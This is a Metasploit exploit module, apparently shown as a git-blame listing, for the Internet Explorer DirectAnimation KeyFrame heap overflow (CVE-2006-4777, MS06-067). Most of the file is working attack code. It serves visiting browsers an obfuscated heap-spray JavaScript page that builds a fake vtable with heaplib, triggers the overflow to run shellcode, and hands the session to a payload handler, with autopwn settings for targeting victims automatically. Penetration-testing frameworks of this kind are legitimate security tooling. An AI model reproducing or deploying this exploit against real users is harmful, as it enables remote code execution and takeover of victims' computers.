2007-04-03 07:35:54 +00:00
|
|
|
##
|
2007-05-07 04:48:45 +00:00
|
|
|
# $Id$
|
2007-04-03 07:35:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-04-03 07:35:54 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-04-03 07:35:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = NormalRanking
|
2007-04-03 07:35:54 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# This module acts as an HTTP server
|
|
|
|
#
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
autopwn_info({
|
|
|
|
:ua_name => HttpClients::IE,
|
2009-12-18 19:38:52 +00:00
|
|
|
:ua_minver => "6.0",
|
2010-04-30 08:40:19 +00:00
|
|
|
:javascript => true,
|
2009-07-22 20:14:35 +00:00
|
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
|
|
:vuln_test => 'KeyFrame',
|
|
|
|
:classid => 'DirectAnimation.PathControl',
|
|
|
|
:rank => NormalRanking # reliable memory corruption
|
|
|
|
})
|
|
|
|
|
2007-04-03 07:35:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a heap overflow vulnerability in the KeyFrame method of the
|
|
|
|
direct animation ActiveX control. This is a port of the exploit implemented by
|
|
|
|
Alexander Sotirov.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2010-04-30 08:40:19 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
2007-04-03 07:35:54 +00:00
|
|
|
# Did all the hard work
|
2010-04-30 08:40:19 +00:00
|
|
|
'Alexander Sotirov <asotirov@determina.com>',
|
2007-04-03 07:35:54 +00:00
|
|
|
# Integrated into msf
|
2010-04-30 08:40:19 +00:00
|
|
|
'skape',
|
2007-04-03 07:35:54 +00:00
|
|
|
],
|
2007-05-07 04:48:45 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-04-30 08:40:19 +00:00
|
|
|
'References' =>
|
2007-04-03 07:35:54 +00:00
|
|
|
[
|
2008-01-27 02:13:54 +00:00
|
|
|
[ 'CVE', '2006-4777' ],
|
2009-06-07 20:20:42 +00:00
|
|
|
[ 'OSVDB', '28842' ],
|
2007-04-03 07:35:54 +00:00
|
|
|
[ 'BID', '20047' ],
|
2010-06-15 23:49:17 +00:00
|
|
|
[ 'MSB', 'MS06-067' ],
|
|
|
|
[ 'URL', 'https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip' ]
|
2007-04-03 07:35:54 +00:00
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
# Maximum payload size is limited by heaplib
|
|
|
|
'Space' => 870,
|
|
|
|
'MinNops' => 32,
|
2010-04-30 08:40:19 +00:00
|
|
|
'Compat' =>
|
2007-04-03 07:35:54 +00:00
|
|
|
{
|
|
|
|
'ConnectionType' => '-find',
|
|
|
|
},
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows 2000/XP/2003 Universal', { }],
|
|
|
|
],
|
2007-04-03 07:48:07 +00:00
|
|
|
'DisclosureDate' => 'Nov 14 2006',
|
2007-04-03 07:35:54 +00:00
|
|
|
'DefaultTarget' => 0))
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
2007-04-03 07:49:27 +00:00
|
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-04-03 07:35:54 +00:00
|
|
|
# This is taken directly from Alex's exploit -- all credit goes to him.
|
|
|
|
trigger_js = heaplib(
|
|
|
|
"var target = new ActiveXObject('DirectAnimation.PathControl');\n" +
|
|
|
|
"var heap = new heapLib.ie();\n" +
|
2007-04-03 07:50:02 +00:00
|
|
|
"var shellcode = unescape('#{Rex::Text.to_unescape(p.encoded)}');\n" +
|
2007-04-03 07:35:54 +00:00
|
|
|
"var jmpecx = 0x4058b5;\n" +
|
|
|
|
"var vtable = heap.vtable(shellcode, jmpecx);\n" +
|
|
|
|
"var fakeObjPtr = heap.lookasideAddr(vtable);\n" +
|
|
|
|
"var fakeObjChunk = heap.padding((0x200c-4)/2) + heap.addr(fakeObjPtr) + heap.padding(14/2);\n" +
|
|
|
|
"heap.gc();\n" +
|
|
|
|
"for (var i = 0; i < 100; i++)\n" +
|
|
|
|
" heap.alloc(vtable)\n" +
|
|
|
|
"heap.lookaside(vtable);\n" +
|
|
|
|
"for (var i = 0; i < 100; i++)\n" +
|
|
|
|
" heap.alloc(0x2010)\n" +
|
|
|
|
"heap.freeList(fakeObjChunk, 2);\n" +
|
|
|
|
"target.KeyFrame(0x40000801, new Array(1), new Array(1));\n" +
|
|
|
|
"delete heap;\n")
|
|
|
|
|
|
|
|
# Obfuscate it up a bit
|
|
|
|
trigger_js = obfuscate_js(trigger_js,
|
2010-04-30 08:40:19 +00:00
|
|
|
'Symbols' =>
|
2007-04-03 07:35:54 +00:00
|
|
|
{
|
|
|
|
'Variables' => [ 'target', 'heap', 'shellcode', 'jmpecx', 'fakeObjPtr', 'fakeObjChunk' ]
|
|
|
|
})
|
|
|
|
|
|
|
|
# Fire off the page to the client
|
2010-04-30 08:40:19 +00:00
|
|
|
send_response(cli,
|
2007-04-03 07:35:54 +00:00
|
|
|
"<html><script language='javascript'>#{trigger_js}</script></html>")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-04-04 04:34:17 +00:00
|
|
|
# Handle the payload
|
2007-04-03 07:35:54 +00:00
|
|
|
handler(cli)
|
|
|
|
end
|
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|